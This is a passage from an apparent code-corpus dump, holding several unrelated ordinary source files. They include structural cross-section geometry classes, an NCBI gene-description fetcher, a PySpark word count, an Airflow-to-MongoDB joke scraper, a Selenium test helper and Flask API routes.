at the last point\n if i != len(self.points) - 1:\n self.facets.append([i, i + 1])\n # if we are at the last point, complete the loop\n else:\n self.facets.append([len(self.points) - 1, 0])\n\n self.perimeter = list(range(len(self.facets)))\n\n self.shift_section()\n\n\nclass ZedSection(Geometry):\n \"\"\"Constructs a Zed section with the bottom left corner at the origin *(0, 0)*, with depth *d*,\n left flange width *b_l*, right flange width *b_r*, lip *l*, thickness *t* and outer radius\n *r_out*, using *n_r* points to construct the radius. If the outer radius is less than the\n thickness of the Zed Section, the inner radius is set to zero.\n\n :param float d: Depth of the Zed section\n :param float b_l: Left flange width of the Zed section\n :param float b_r: Right flange width of the Zed section\n :param float l: Lip of the Zed section\n :param float t: Thickness of the Zed section\n :param float r_out: Outer radius of the Zed section\n :param int n_r: Number of points discretising the outer radius\n :param shift: Vector that shifts the cross-section by *(x, y)*\n :type shift: list[float, float]\n :raises Exception: Lip length must be greater than the outer radius\n\n The following example creates a Zed section with a depth of 100, a left flange width of 40, a\n right flange width of 50, a lip of 20, a thickness of 1.2 and an outer radius of 5, using 8\n points to discretise the radius. A mesh is generated with a maximum triangular area of 0.15::\n\n import sectionproperties.pre.sections as sections\n\n geometry = sections.ZedSection(d=100, b_l=40, b_r=50, l=20, t=1.2, r_out=5, n_r=8)\n mesh = geometry.create_mesh(mesh_sizes=[0.15])\n\n .. figure:: ../images/sections/zed_geometry.png\n :align: center\n :scale: 75 %\n\n Zed section geometry.\n\n .. 
figure:: ../images/sections/zed_mesh.png\n :align: center\n :scale: 75 %\n \"\"\"\n\n def __init__(self, d, b_l, b_r, l, t, r_out, n_r, shift=[0, 0]):\n \"\"\"Inits the ZedSection class.\"\"\"\n\n # ensure the lip length is greater than the outer radius\n if l < r_out:\n raise Exception('Lip length must be greater than the outer radius')\n\n # assign control point\n control_points = [[t * 0.5, d * 0.5]]\n\n super().__init__(control_points, shift)\n\n # calculate internal radius\n r_in = max(r_out - t, 0)\n\n # construct the outer bottom left radius\n self.draw_radius([r_out, r_out], r_out, np.pi, n_r)\n\n # construct the outer bottom right radius\n self.draw_radius([b_r - r_out, r_out], r_out, 1.5 * np.pi, n_r)\n\n if r_out != l:\n # add next two points\n self.points.append([b_r, l])\n self.points.append([b_r - t, l])\n\n # construct the inner bottom right radius\n self.draw_radius([b_r - t - r_in, t + r_in], r_in, 0, n_r, False)\n\n # construct the inner bottom left radius\n self.draw_radius([t + r_in, t + r_in], r_in, 1.5 * np.pi, n_r, False)\n\n # construct the outer top right radius\n self.draw_radius([t - r_out, d - r_out], r_out, 0, n_r)\n\n # construct the outer top left radius\n self.draw_radius([t - b_l + r_out, d - r_out], r_out, 0.5 * np.pi, n_r)\n\n if r_out != l:\n # add the next two points\n self.points.append([t - b_l, d - l])\n self.points.append([t - b_l + t, d - l])\n\n # construct the inner top left radius\n self.draw_radius([2 * t - b_l + r_in, d - t - r_in], r_in, np.pi, n_r, False)\n\n # construct the inner top right radius\n self.draw_radius([-r_in, d - t - r_in], r_in, 0.5 * np.pi, n_r, False)\n\n # build the facet list\n for i in range(len(self.points)):\n # if we are not at the last point\n if i != len(self.points) - 1:\n self.facets.append([i, i + 1])\n # if we are at the last point, complete the loop\n else:\n self.facets.append([len(self.points) - 1, 0])\n\n self.perimeter = list(range(len(self.facets)))\n\n self.shift_section()\n\n\nclass CruciformSection(Geometry):\n \"\"\"Constructs a cruciform section centered at the origin *(0, 0)*, with depth *d*, width *b*,\n thickness *t* and root radius *r*, using *n_r* points to construct the root radius.\n\n :param float d: Depth of the cruciform section\n :param float b: Width of the cruciform section\n :param float t: Thickness of the cruciform section\n :param float r: Root radius of the cruciform section\n :param int n_r: Number of points discretising the root radius\n :param shift: Vector that shifts the cross-section by *(x, y)*\n :type shift: list[float, float]\n\n The following example creates a cruciform section with a depth of 250, a width of 175, a\n thickness of 12 and a root radius of 16, using 16 points to discretise the radius. A mesh is\n generated with a maximum triangular area of 5.0::\n\n import sectionproperties.pre.sections as sections\n\n geometry = sections.CruciformSection(d=250, b=175, t=12, r=16, n_r=16)\n mesh = geometry.create_mesh(mesh_sizes=[5.0])\n\n .. figure:: ../images/sections/cruciform_geometry.png\n :align: center\n :scale: 75 %\n\n Cruciform section geometry.\n\n .. 
figure:: ../images/sections/cruciform_mesh.png\n :align: center\n :scale: 75 %\n \"\"\"\n\n def __init__(self, d, b, t, r, n_r, shift=[0, 0]):\n \"\"\"Inits the CruciformSection class.\"\"\"\n\n # assign control point\n control_points = [[0, 0]]\n\n super().__init__(control_points, shift)\n\n # add first two points\n self.points.append([-t * 0.5, -d * 0.5])\n self.points.append([t * 0.5, -d * 0.5])\n\n # construct the bottom right radius\n pt = [0.5 * t + r, -0.5 * t - r]\n self.draw_radius(pt, r, np.pi, n_r, False)\n\n # add the next two points\n self.points.append([0.5 * b, -t * 0.5])\n self.points.append([0.5 * b, t * 0.5])\n\n # construct the top right radius\n pt = [0.5 * t + r, 0.5 * t + r]\n self.draw_radius(pt, r, 1.5 * np.pi, n_r, False)\n\n # add the next two points\n self.points.append([t * 0.5, 0.5 * d])\n self.points.append([-t * 0.5, 0.5 * d])\n\n # construct the top left radius\n pt = [-0.5 * t - r, 0.5 * t + r]\n self.draw_radius(pt, r, 0, n_r, False)\n\n # add the next two points\n self.points.append([-0.5 * b, t * 0.5])\n self.points.append([-0.5 * b, -t * 0.5])\n\n # construct the bottom left radius\n pt = [-0.5 * t - r, -0.5 * t - r]\n self.draw_radius(pt, r, 0.5 * np.pi, n_r, False)\n\n # build the facet list\n for i in range(len(self.points)):\n # if we are not at the last point\n if i != len(self.points) - 1:\n self.facets.append([i, i + 1])\n # if we are at the last point, complete the loop\n else:\n self.facets.append([len(self.points) - 1, 0])\n\n self.perimeter = list(range(len(self.facets)))\n\n self.shift_section()\n\n\nclass PolygonSection(Geometry):\n \"\"\"Constructs a regular hollow polygon section centered at *(0, 0)*, with a pitch circle\n diameter of bounding polygon *d*, thickness *t*, number of sides *n_sides* and an optional\n inner radius *r_in*, using *n_r* points to construct the inner and outer radii (if radii is\n specified).\n\n :param float d: Pitch circle diameter of the outer bounding polygon (i.e. diameter of circle\n that passes through all vertices of the outer polygon)\n :param float t: Thickness of the polygon section wall\n :param float r_in: Inner radius of the polygon corners. By default, if not specified, a polygon\n with no corner radii is generated.\n :param int n_r: Number of points discretising the inner and outer radii, ignored if no inner\n radii is specified\n :param rot: Initial counterclockwise rotation in degrees. By default bottom face is aligned\n with x axis.\n :param shift: Vector that shifts the cross-section by *(x, y)*\n :type shift: list[float, float]\n :raises Exception: Number of sides in polygon must be greater than or equal to 3\n\n The following example creates an Octagonal section (8 sides) with a diameter of 200, a\n thickness of 6 and an inner radius of 20, using 12 points to discretise the inner and outer\n radii. A mesh is generated with a maximum triangular area of 5::\n\n import sectionproperties.pre.sections as sections\n\n geometry = sections.PolygonSection(d=200, t=6, n_sides=8, r_in=20, n_r=12)\n mesh = geometry.create_mesh(mesh_sizes=[5])\n\n .. figure:: ../images/sections/polygon_geometry.png\n :align: center\n :scale: 75 %\n\n Octagonal section geometry.\n\n .. 
figure:: ../images/sections/polygon_mesh.png\n :align: center\n :scale: 75 %\n\n Mesh generated from the above geometry.\n \"\"\"\n\n def __init__(self, d, t, n_sides, r_in=0, n_r=1, rot=0, shift=[0, 0]):\n \"\"\"Inits the PolygonSection class.\"\"\"\n\n if n_sides < 3:\n msg = 'n_sides required to be greater than 3 for PolygonSection class'\n raise Exception(msg)\n\n # initial rotation\n rot = rot * np.pi / 180 # radians\n\n # determine triangular segment angle\n alpha = 2 * np.pi / n_sides # radians\n\n # determine distance from origin to point perpendicular on face of side\n a_out = d / 2 * np.cos(alpha / 2)\n a_in = a_out - t\n\n # determine side length for outer & inner faces neglecting radii\n side_length_out = d * np.sin(alpha / 2)\n side_length_in = a_in / a_out * side_length_out\n\n # check limit on internal radii, if exceeded then radii merge to circle\n if r_in > a_in:\n r_in = a_in\n circle = True\n else:\n circle = False\n\n # calculate external radius, if r_in is zero, r_out also is zero\n if r_in == 0:\n r_out = 0\n n_r = 1\n else:\n r_out = r_in + t\n\n # equivalent side length of half the corner radii triangular segment\n c_out = r_out * (side_length_out / 2) / a_out\n c_in = r_in * (side_length_in / 2) / a_in\n\n # determine straight side length between corner radii (if present)\n side_length_straight_out = side_length_out - (2 * c_out)\n side_length_straight_in = side_length_in - (2 * c_in)\n\n # assign control point central on bottom side length & rotate to initial rotation specified\n control_points = [self.rotate([0, -a_out + t / 2], rot)]\n\n super().__init__(control_points, shift)\n\n # temp list for repeating geometry\n base_points = []\n\n # specify a hole in the centre of the Polygon section\n self.holes = [[0, 0]]\n\n # start at bottom face, constructing one corner radii, then rotate by initial rotation +\n # alpha and repeat for n_side number of times to form full section perimeter\n\n # construct the first radius (bottom right)\n for i in range(n_r):\n # determine polar angle\n theta = 1 / 2 * np.pi + i * 1.0 / max(1, n_r - 1) * alpha\n\n # calculate location of inner and outer points\n x_outer = side_length_straight_out / 2 - r_out * np.cos(theta)\n y_outer = -a_out + r_out - r_out * np.sin(theta)\n x_inner = side_length_straight_in / 2 - r_in * np.cos(theta)\n y_inner = -a_in + r_in - r_in * np.sin(theta)\n\n # append the current temporary points to the temporary points list\n base_points.append([x_outer, y_outer])\n base_points.append([x_inner, y_inner])\n\n # if radii merged to circle with an outer diameter of a_out then skip last point as causes\n # overlapping end points which causes meshing issues if geometry is not cleaned by user\n if circle:\n base_points = base_points[0:-2]\n\n # iterate and add subsequent corner radii one point at a time for each side\n for i in range(n_sides):\n for point in base_points:\n point_new = self.rotate(point, alpha * i + rot)\n self.points.append(point_new)\n\n # build the facet list\n num_points = int(len(self.points) / 2)\n for i in range(num_points):\n # if we are not at the last point\n if i != num_points - 1:\n self.facets.append([i * 2, i * 2 + 2])\n self.facets.append([i * 2 + 1, i * 2 + 3])\n # if we are at the last point, complete the loop\n else:\n self.facets.append([i * 2, 0])\n self.facets.append([i * 2 + 1, 1])\n\n self.perimeter = list(range(0, len(self.facets), 2))\n\n self.shift_section()\n\n def rotate(self, point, angle):\n \"\"\"\n Rotate a point counterclockwise by a given angle around origin [0, 
0]\n\n :param list point: Point coordinates to be rotated\n :param float angle: Angle to rotate point coordinates\n :return: Coordinates of rotated point\n :rtype: list[float, float]\n \"\"\"\n\n pt_x, pt_y = point\n\n c = np.cos(angle)\n s = np.sin(angle)\n\n new_x = c * pt_x - s * pt_y\n new_y = s * pt_x + c * pt_y\n\n return [new_x, new_y]\n\n\nclass BoxGirderSection(Geometry):\n \"\"\"Constructs a Box Girder section centered at at *(max(b_t, b_b)/2, d/2)*, with depth *d*, top\n width *b_t*, bottom width *b_b*, top flange thickness *t_ft*, bottom flange thickness *t_fb*\n and web thickness *t_w*.\n\n :param float d: Depth of the Box Girder section\n :param float b_t: Top width of the Box Girder section\n :param float b_b: Bottom width of the Box Girder section\n :param float t_ft: Top lange thickness of the Box Girder section\n :param float t_fb: Bottom flange thickness of the Box Girder section\n :param float t_w: Web thickness of the Box Girder section\n :param shift: Vector that shifts the cross-section by *(x, y)*\n :type shift: list[float, float]\n\n The following example creates a Box Gider section with a depth of 1200, a top width of 1200, a\n bottom width of 400, a top flange thickness of 16, a bottom flange thickness of 12 and a web\n thickness of 8. A mesh is generated with a maximum triangular area of 5.0::\n\n import sectionproperties.pre.sections as sections\n\n geometry = sections.BoxGirderSection(d=1200, b_t=1200, b_b=400, t_ft=100, t_fb=80, t_w=50)\n mesh = geometry.create_mesh(mesh_sizes=[200.0])\n\n .. figure:: ../images/sections/box_girder_geometry.png\n :align: center\n :scale: 75 %\n\n Box Girder geometry.\n\n .. figure:: ../images/sections/box_girder_mesh.png\n :align: center\n :scale: 75 %\n\n Mesh generated from the above geometry.\n \"\"\"\n\n def __init__(self, d, b_t, b_b, t_ft, t_fb, t_w, shift=[0, 0]):\n \"\"\"Inits the BoxGirderSection class.\"\"\"\n\n # assign control point\n control_points = [[max(b_t, b_b) * 0.5, t_fb * 0.5]]\n\n super().__init__(control_points, shift)\n\n # calculate central axis\n x_c = max(b_t, b_b) * 0.5\n\n # specify a hole in the centre of the Box Girder\n self.holes = [[x_c, d * 0.5]]\n\n # determine side wall angle\n if b_t < b_b:\n phi_b = np.arctan2(d, 0.5 * (b_b - b_t))\n phi_t = np.pi - phi_b\n else:\n phi_t = np.arctan2(d, 0.5 * (b_t - b_b))\n phi_b = np.pi - phi_t\n\n # determine inner wall x-offsets\n x_bot = t_fb / np.tan(np.pi - phi_b)\n x_top = t_ft / np.tan(np.pi - phi_t)\n web_x = abs(t_w / np.sin(np.pi - phi_b))\n\n # add outer points\n self.points.append([x_c - 0.5 * b_b, 0])\n self.points.append([x_c + 0.5 * b_b, 0])\n self.points.append([x_c + 0.5 * b_t, d])\n self.points.append([x_c - 0.5 * b_t, d])\n\n # add inner points\n self.points.append([x_c - 0.5 * b_b - x_bot + web_x, t_fb])\n self.points.append([x_c + 0.5 * b_b + x_bot - web_x, t_fb])\n self.points.append([x_c + 0.5 * b_t + x_top - web_x, d - t_ft])\n self.points.append([x_c - 0.5 * b_t - x_top + web_x, d - t_ft])\n\n # build facet list\n self.facets = [[0, 1], [1, 2], [2, 3], [3, 0], [4, 5], [5, 6], [6, 7], [7, 4]]\n self.perimeter = [0, 1, 2, 3]\n\n self.shift_section()\n\n\nclass MergedSection(Geometry):\n \"\"\"Merges a number of section geometries into one geometry. 
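When geometries are combined, the facet indices of each subsequent geometry are offset by the number of points already collected, so facets keep referencing the correct vertices; a rough sketch of the idea (not verbatim library code; ``geom_a`` and ``geom_b`` are assumed to be existing ``Geometry`` objects)::\n\n        offset = len(geom_a.points)\n        points = geom_a.points + geom_b.points\n        facets = geom_a.facets + [[f[0] + offset, f[1] + offset] for f in geom_b.facets]\n\n    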
Note that for the meshing algorithm\n to work, there needs to be connectivity between all regions of the provided geometries.\n Overlapping of geometries is permitted.\n\n :param sections: A list of geometry objects to merge into one\n :class:`~sectionproperties.pre.sections.Geometry` object\n :type sections: list[:class:`~sectionproperties.pre.sections.Geometry`]\n\n The following example creates a combined cross-section with a 150x100x6 RHS placed on its side\n on top of a 200UB25.4. A mesh is generated with a maximum triangle size of 5.0 for the\n I-section and 2.5 for the RHS::\n\n import sectionproperties.pre.sections as sections\n\n isection = sections.ISection(d=203, b=133, t_f=7.8, t_w=5.8, r=8.9, n_r=8)\n box = sections.Rhs(d=100, b=150, t=6, r_out=15, n_r=8, shift=[-8.5, 203])\n\n geometry = sections.MergedSection([isection, box])\n geometry.clean_geometry()\n mesh = geometry.create_mesh(mesh_sizes=[5.0, 2.5])\n\n .. figure:: ../images/sections/merged_geometry.png\n :align: center\n :scale: 75 %\n\n Merged section geometry.\n\n .. figure:: ../images/sections/merged_mesh.png\n :align: center\n :scale: 75 %\n \"\"\"\n\n def __init__(self, sections):\n \"\"\"Inits the MergedSection class.\"\"\"\n\n super().__init__([], [0, 0])\n\n point_count = 0\n\n # loop through all sections\n for section in sections:\n # add facets\n for facet in section.facets:\n self.facets.append([facet[0] + point_count, facet[1] + point_count])\n\n # add points and count points\n for point in section.points:\n self.points.append([point[0], point[1]])\n point_count += 1\n\n # add holes\n for hole in section.holes:\n self.holes.append([hole[0], hole[1]])\n\n # add control points\n for control_point in section.control_points:\n self.control_points.append([control_point[0], control_point[1]])\n"} {"ext": "py", "sha": "1a30a24a49950f8e2efef573c74f8e3e2976113d", "content": "#!/usr/bin/env python\n\"\"\"\nFetch descriptions from NCBI given file with gene names.\n\nIntended to use on genes from Gene2Products.need-curating.txt\nfrom funannotate annotate formatted as single column, new line\nseparated text file.\n\nOutputs 2 column TSV ready for update-gene2products.py\n\nUsage: python grab_gene_descriptions.py \n\nCam Gilchrist\n2018-05-29\n\"\"\"\n\nimport sys\nfrom Bio import Entrez\nfrom collections import Counter\n\n# *Always* tell NCBI who you are\nEntrez.email = \"cameron.gilchrist@research.uwa.edu.au\"\n\ndef read_genes(gene_file):\n \"\"\"Read in list of gene names from \\n separated text file and\n return list.\"\"\"\n genes = []\n with open(gene_file, 'rU') as genefile:\n for gene in genefile:\n gene = gene.strip()\n genes.append(gene)\n return(genes)\n\ndef retrieve_descriptions(gene, descriptions, empties):\n \"\"\"Given single gene name, grab possible descriptions from NCBI\n and prompt user to select one\"\"\"\n\n # Perform ESearch and grab list of IDs\n query = gene + '[Gene Name]'\n handle = Entrez.esearch(db='gene', term=query,\n retmax=100,\n retmode='xml')\n record = Entrez.read(handle)\n handle.close()\n idlist = ','.join(record[\"IdList\"])\n\n # Ensure you have results, exit if not\n if idlist == '':\n print('No records for {}, skipping...\\n'.format(gene))\n empties.append(gene)\n return\n\n # Generate summary from UID list\n handle = Entrez.esummary(db='gene', id=idlist)\n record = Entrez.read(handle)\n handle.close()\n\n # Grab description, counter for unique values\n desc_cnt = Counter()\n doc_sums = record[u'DocumentSummarySet'][u'DocumentSummary']\n for i in range(len(doc_sums)):\n if 
doc_sums[i][u'NomenclatureName'] != '':\n desc = doc_sums[i][u'NomenclatureName']\n else:\n desc = doc_sums[i][u'OtherDesignations'].split('|')[0]\n desc_cnt[desc] += 1\n\n # Create list from counter keys for indexing purposes\n desc_list = filter(None, desc_cnt)\n if len(desc_cnt) > 1:\n print('{} has {} unique descriptions from {} results. These are:'.format(\n gene, len(desc_list), len(doc_sums)))\n ans_range = range(len(desc_list))\n for i in ans_range:\n print ('{}: {} [{}/{}]'.format(i+1, desc_list[i], desc_cnt[desc_list[i]], len(doc_sums)))\n\n # Take user input to accept/reject a description\n while True:\n ans = raw_input('Which do you accept? [{}-{}/N]: '.format(\n min(ans_range)+1, max(ans_range)+1))\n # Check if int or str entered\n try:\n ans = int(ans)-1\n if ans in ans_range:\n print('Accepting #{}.\\n'.format(ans+1))\n descriptions[gene] = desc_list[ans]\n break\n else:\n print('{} is outside acceptable range. Try again.'.format(\n ans))\n except:\n if ans in ['N', 'n', 'no', 'No']:\n print('Skipping this gene.\\n')\n break\n else:\n print('Invalid input, try again.')\n\n # If there's only one unique description, accept/reject\n elif len(desc_cnt) == 1:\n desc_list2 = list(desc_cnt)\n desc = desc_list2[0]\n if desc == '':\n print('{} has empty description.'.format(gene))\n empties.append(gene)\n return\n print('{} only has one unique description from {} results.'.format(\n gene, len(doc_sums)))\n print('This is:\\n{}'.format(desc))\n\n while True:\n ans = raw_input('Accept? Y/N: ')\n if ans in ['Y', 'y', 'yes', 'Yes']:\n print('Description accepted.\\n')\n descriptions[gene] = desc\n break\n elif ans in ['N', 'n', 'no', 'No']:\n print('Skipping this gene.\\n')\n empties.append(gene)\n break\n else:\n print('Invalid input, try again.')\n return(descriptions)\n\ndef print_descriptions(descriptions, outfile):\n \"\"\"Print descriptions as 2 column TSV for update-gene2products.py\"\"\"\n with open(outfile, 'w') as out:\n out.write('Empty descriptions:\\n')\n for gene in empties:\n out.write('{}\\n'.format(gene))\n out.write('\\nNon-empty descriptions:\\n')\n for gene in descriptions:\n out.write('{}\\t{}\\n'.format(gene, descriptions[gene]))\n\n# Read in genes from file and summarize\ngenes = read_genes(sys.argv[1])\nprint('There are {} genes in {}. These are:\\n{}\\n'.format(\n len(genes), sys.argv[1], ', '.join(genes))\n )\n\n# Fetch descriptions\nempties = []\ndescriptions = {}\nfor gene in genes:\n retrieve_descriptions(gene, descriptions, empties)\n\n# Write to output file given in second argument\nprint_descriptions(descriptions, sys.argv[2])\nprint('All done. 
Remember to check {} to correct errors or make adjustments!'.format(sys.argv[2]))\n"} {"ext": "py", "sha": "1a30a264b8b6d90a3872d7bd2541e30623e9d755", "content": "from pyspark import SparkContext, SparkConf\r\n\r\nif __name__ == \"__main__\":\r\n conf = SparkConf().setAppName(\"word count\").setMaster(\"local[3]\")\r\n\r\n # Spark Context\r\n sc = SparkContext(conf=conf)\r\n sc.setLogLevel(\"ERROR\")\r\n\r\n # Load input\r\n lines = sc.textFile(\"inputs/word_count.text\")\r\n\r\n # Split the sentences into words\r\n words = lines.flatMap(lambda line: line.split(\" \"))\r\n\r\n # Count occurrence of each word\r\n wordCounts = words.countByValue()\r\n\r\n # Print the count\r\n for word, count in wordCounts.items():\r\n print(\"{} : {}\".format(word, count))\r\n"} {"ext": "py", "sha": "1a30a26e3a2261c32bd7108e1dd0d797d256e8fe", "content": "import requests\nfrom pymongo import MongoClient\nfrom datetime import datetime\nfrom airflow.providers.mongo.hooks.mongo import MongoHook\n\n\ndef get_raw_joke():\n \"\"\"Retrieve a joke from 'jokeapi' and return it in dict format.\"\"\"\n base_url = \"https://v2.jokeapi.dev\"\n response = requests.get(f\"{base_url}/joke/any\")\n return response.json()\n\n\ndef preprocess_joke(raw_joke: dict):\n \"\"\"Perform preprocessing to clean raw jokes.\"\"\"\n dictObject = {}\n dictObject[\"type\"] = raw_joke.get(\"type\")\n dictObject[\"category\"] = raw_joke.get(\"category\")\n\n if raw_joke.get(\"type\") == \"single\":\n dictObject[\"joke\"] = raw_joke.get(\"joke\")\n return dictObject\n\n elif raw_joke.get(\"type\") == \"twopart\":\n dictObject[\"joke\"] = {}\n dictObject[\"joke\"][\"setup\"] = raw_joke.get(\"setup\")\n dictObject[\"joke\"][\"delivery\"] = raw_joke.get(\"delivery\")\n return dictObject\n\n else:\n print(\"Joke is of neither 'single' nor 'twopart' type.\")\n\n\ndef serialize_joke(joke: dict):\n \"\"\"Save jokes into local MongoDB instance.\"\"\"\n if joke:\n joke[\"datetime\"] = f\"{datetime.now():%Y-%m-%d %H:%M:%S%z}\"\n\n # Using PyMongo\n # uri = \"mongodb://root:example@mongo:27017\" # this works\n uri = \"mongodb://airflow:airflow@mongo:27017\" # this works too\n # uri = \"mongodb://airflow:airflow@localhost:3456\" # but this does not work\n client = MongoClient(uri)\n db = client.the_database\n collection = db.jokes\n result = collection.insert_one(joke)\n print(f\"{result.inserted_id} is inserted!\")\n\n # Using MongoHook wrapper\n # mongo_hook = MongoHook(conn_id=\"MONGO\")\n # client = mongo_hook.get_conn()\n # db = client.the_database\n # collection = db.jokes\n # result = collection.insert_one(joke)\n # print(f\"{result.inserted_id} is inserted!\")\n\n\ndef scrap_joke():\n raw_joke = get_raw_joke()\n joke = preprocess_joke(raw_joke)\n serialize_joke(joke)\n\n\nif __name__ == \"__main__\":\n scrap_joke()\n"} {"ext": "py", "sha": "1a30a2804af4e17d7ef8f6079816ce52a0b6850d", "content": "from model.group import Group\n\n\nclass GroupHelper:\n def __init__(self, app):\n self.app = app\n\n def open_groups_page(self):\n wd = self.app.wd\n if not(wd.current_url.endswith(\"/group.php\") and len(wd.find_elements_by_name(\"new\")) > 0):\n wd.find_element_by_link_text(\"groups\").click()\n\n def create(self, group):\n wd = self.app.wd\n self.open_groups_page()\n # init group creation\n wd.find_element_by_xpath(\"//div[@id='content']/form/input[4]\").click()\n self.fill_group_form(group)\n # submit group creation\n wd.find_element_by_name(\"submit\").click()\n self.return_to_groups_page()\n self.group_cache = None\n\n def delete_first_group(self):\n 
self.delete_group_by_index(0)\n\n def delete_group_by_index(self, index):\n wd = self.app.wd\n self.open_groups_page()\n self.select_group_by_index(index)\n # submit deletion\n wd.find_element_by_name(\"delete\").click()\n self.return_to_groups_page()\n self.group_cache = None\n\n def delete_group_by_id(self, id):\n wd = self.app.wd\n self.open_groups_page()\n self.select_group_by_id(id)\n # submit deletion\n wd.find_element_by_name(\"delete\").click()\n self.return_to_groups_page()\n self.group_cache = None\n\n def delete_all_groups(self):\n wd = self.app.wd\n self.open_groups_page()\n nmb_groups = self.count()\n if nmb_groups != 0:\n for ndx in range(0, nmb_groups):\n self.select_group_by_index(ndx)\n # submit deletion\n wd.find_element_by_name(\"delete\").click()\n self.group_cache = None\n self.return_to_groups_page()\n\n def select_first_group(self):\n self.select_group_by_index(0)\n\n def select_group_by_index(self, index):\n wd = self.app.wd\n wd.find_elements_by_name(\"selected[]\")[index].click()\n\n def select_group_by_id(self, id):\n wd = self.app.wd\n wd.find_element_by_css_selector(\"input[value='%s']\" % id).click()\n\n def modify_first_group(self, new_group_data):\n self.modify_group_by_index(0, new_group_data)\n\n def modify_group_by_index(self, index, new_group_data):\n wd = self.app.wd\n self.open_groups_page()\n self.select_group_by_index(index)\n # open modification form\n wd.find_element_by_name(\"edit\").click()\n # fill group form\n self.fill_group_form(new_group_data)\n # submit modification\n wd.find_element_by_name(\"update\").click()\n self.return_to_groups_page()\n self.group_cache = None\n\n def modify_group_by_id(self, id, new_group_data):\n wd = self.app.wd\n self.open_groups_page()\n self.select_group_by_id(id)\n # open modification form\n wd.find_element_by_name(\"edit\").click()\n # fill group form\n self.fill_group_form(new_group_data)\n # submit modification\n wd.find_element_by_name(\"update\").click()\n self.return_to_groups_page()\n self.group_cache = None\n\n def fill_group_form(self, group):\n self.change_field_value(\"group_name\", group.name)\n self.change_field_value(\"group_header\", group.header)\n self.change_field_value(\"group_footer\", group.footer)\n\n def change_field_value(self, field_name, text):\n wd = self.app.wd\n if text is not None:\n wd.find_element_by_name(field_name).click()\n wd.find_element_by_name(field_name).clear()\n wd.find_element_by_name(field_name).send_keys(text)\n\n def return_to_groups_page(self):\n self.open_groups_page()\n\n def count(self):\n wd = self.app.wd\n self.open_groups_page()\n return len(wd.find_elements_by_name(\"selected[]\"))\n\n group_cache = None\n\n def get_group_list(self):\n if self.group_cache is None:\n wd = self.app.wd\n self.open_groups_page()\n self.group_cache = []\n for element in wd.find_elements_by_css_selector(\"span.group\"):\n text = element.text\n id = element.find_element_by_name(\"selected[]\").get_attribute(\"value\")\n self.group_cache.append(Group(name=text, id=id))\n return list(self.group_cache)\n"} {"ext": "py", "sha": "1a30a420795a24eaa5ec5d6146213c0cb87935a5", "content": "from flask import abort, jsonify\nfrom flask_login import login_required\n\nfrom depc.apiv1 import api, format_object, get_payload\nfrom depc.controllers.variables import VariableController\nfrom depc.users import TeamPermission\n\nVISIBLE = [\"name\", \"value\", \"type\", \"expression\"]\n\n\ndef format_variable(source):\n visible = list(VISIBLE)\n s = format_object(source, visible)\n return 
s\n\n\n@api.route(\"/teams//variables\")\n@login_required\ndef list_team_variables(team_id):\n \"\"\"\n\n .. :quickref: GET; Lorem ipsum.\"\"\"\n if not TeamPermission.is_user(team_id):\n abort(403)\n\n variables = VariableController.list(\n filters={\n \"Variable\": {\n \"team_id\": team_id,\n \"rule_id\": None,\n \"source_id\": None,\n \"check_id\": None,\n }\n }\n )\n\n return jsonify([format_variable(v) for v in variables]), 200\n\n\n@api.route(\"/teams//rules//variables\")\n@login_required\ndef list_rule_variables(team_id, rule_id):\n \"\"\"\n\n .. :quickref: GET; Lorem ipsum.\"\"\"\n if not TeamPermission.is_user(team_id):\n abort(403)\n\n variables = VariableController.list(\n filters={\n \"Variable\": {\n \"team_id\": team_id,\n \"rule_id\": rule_id,\n \"source_id\": None,\n \"check_id\": None,\n }\n }\n )\n\n return jsonify([format_variable(v) for v in variables]), 200\n\n\n@api.route(\"/teams//sources//variables\")\n@login_required\ndef list_source_variables(team_id, source_id):\n \"\"\"\n\n .. :quickref: GET; Lorem ipsum.\"\"\"\n if not TeamPermission.is_user(team_id):\n abort(403)\n\n variables = VariableController.list(\n filters={\n \"Variable\": {\n \"team_id\": team_id,\n \"rule_id\": None,\n \"source_id\": source_id,\n \"check_id\": None,\n }\n }\n )\n\n return jsonify([format_variable(v) for v in variables]), 200\n\n\n@api.route(\"/teams//sources//checks//variables\")\n@login_required\ndef list_check_variables(team_id, source_id, check_id):\n \"\"\"\n\n .. :quickref: GET; Lorem ipsum.\"\"\"\n if not TeamPermission.is_user(team_id):\n abort(403)\n\n variables = VariableController.list(\n filters={\n \"Variable\": {\n \"team_id\": team_id,\n \"rule_id\": None,\n \"source_id\": source_id,\n \"check_id\": check_id,\n }\n }\n )\n\n return jsonify([format_variable(v) for v in variables]), 200\n\n\n@api.route(\"/teams//variables/\")\n@login_required\ndef get_team_variable(team_id, variable_id):\n \"\"\"\n\n .. :quickref: GET; Lorem ipsum.\"\"\"\n if not TeamPermission.is_user(team_id):\n abort(403)\n\n variable = VariableController.get(\n filters={\n \"Variable\": {\n \"id\": variable_id,\n \"team_id\": team_id,\n \"rule_id\": None,\n \"source_id\": None,\n \"check_id\": None,\n }\n }\n )\n\n return jsonify(format_variable(variable)), 200\n\n\n@api.route(\"/teams//rules//variables/\")\n@login_required\ndef get_rule_variable(team_id, rule_id, variable_id):\n \"\"\"\n\n .. :quickref: GET; Lorem ipsum.\"\"\"\n if not TeamPermission.is_user(team_id):\n abort(403)\n\n variable = VariableController.get(\n filters={\n \"Variable\": {\n \"id\": variable_id,\n \"team_id\": team_id,\n \"rule_id\": rule_id,\n \"source_id\": None,\n \"check_id\": None,\n }\n }\n )\n\n return jsonify(format_variable(variable)), 200\n\n\n@api.route(\"/teams//sources//variables/\")\n@login_required\ndef get_source_variable(team_id, source_id, variable_id):\n \"\"\"\n\n .. :quickref: GET; Lorem ipsum.\"\"\"\n if not TeamPermission.is_user(team_id):\n abort(403)\n\n variable = VariableController.get(\n filters={\n \"Variable\": {\n \"id\": variable_id,\n \"team_id\": team_id,\n \"rule_id\": None,\n \"source_id\": source_id,\n \"check_id\": None,\n }\n }\n )\n\n return jsonify(format_variable(variable)), 200\n\n\n@api.route(\n \"/teams//sources//checks//variables/\"\n)\n@login_required\ndef get_check_variable(team_id, source_id, check_id, variable_id):\n \"\"\"\n\n .. 
